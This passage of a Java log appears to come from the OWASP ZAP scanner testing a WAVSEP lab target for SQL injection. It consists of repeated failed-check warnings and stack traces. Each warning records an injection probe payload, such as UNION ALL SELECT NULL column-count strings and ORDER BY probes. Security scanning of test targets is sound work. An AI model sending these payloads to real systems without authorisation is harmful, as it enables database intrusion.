Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682240 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682241 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682241 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682242 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682242 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682243 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6526-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6526-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682244 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682245 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682245 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682246 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682247 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682248 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682248 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 